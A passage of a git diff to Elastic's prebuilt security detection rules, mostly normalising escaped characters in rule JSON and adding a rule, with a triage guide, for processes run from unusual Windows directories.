Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json index c8b6a501442..1a87e1c96d0 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_107.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json index b7e0b9a87b5..d77d9e4ea8c 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_108.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json index 0ef2be18456..28a171fe407 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_109.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json index a17b9f08954..e2f450cfb5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json index 400070a6968..bfc78002731 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json index d660d2fc75c..137a8690802 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_105.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json index f77f11e5fa3..7aafbfc7729 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_106.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json index 9ab21f9927a..0964206586f 100644 --- a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_107.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json index d97df084acb..7b62464cf8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_104.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json index c8163290f3b..9dc93bdaa5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_105.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json index 268782456a7..04f43959019 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_106.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json index d29beb69cc4..100c5574137 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6_107.json @@ -48,7 +48,7 @@ ], "risk_score": 73, "rule_id": "ebb200e8-adf0-43f8-a0bb-4ee5b5d852c6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json index 7524f62af0f..6f5e0555a07 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_104.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json index 76712eb28cc..d0f0b4d4617 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_105.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json index d14e8fa86a7..950f14b1459 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_106.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json index 467ac76b573..113c858554b 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebf1adea-ccf2-4943-8b96-7ab11ca173a5_107.json @@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "ebf1adea-ccf2-4943-8b96-7ab11ca173a5", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json index e7226dbeb55..c5ddf1d8edb 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_104.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json index 1527ca28c71..d646df70f78 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_105.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json index f02dbc92bc0..59f746cf0b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_106.json @@ -50,7 +50,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json index 791cd5e7c05..dfe5bbfe899 100644 --- a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_107.json @@ -49,7 +49,7 @@ ], "risk_score": 47, "rule_id": "ebfe1448-7fac-4d59-acea-181bd89b1f7f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json new file mode 100644 index 00000000000..fac3d857893 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ebfe1448-7fac-4d59-acea-181bd89b1f7f_108.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies process execution from suspicious default Windows directories. This is sometimes done by adversaries to hide malware in trusted paths.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Execution from an Unusual Directory", + "note": "## Triage and analysis\n\n### Investigating Process Execution from an Unusual Directory\n\nThis rule identifies processes that are executed from suspicious default Windows directories. Adversaries may abuse this technique by planting malware in trusted paths, making it difficult for security analysts to discern if their activities are malicious or take advantage of exceptions that may apply to these paths.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes, examining their executable files for prevalence, location, and valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine arguments and working directory to determine the program's source or the nature of the tasks it is performing.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of executable and signature conditions.\n\n### Related Rules\n\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Execution from Unusual Directory - Command Line - 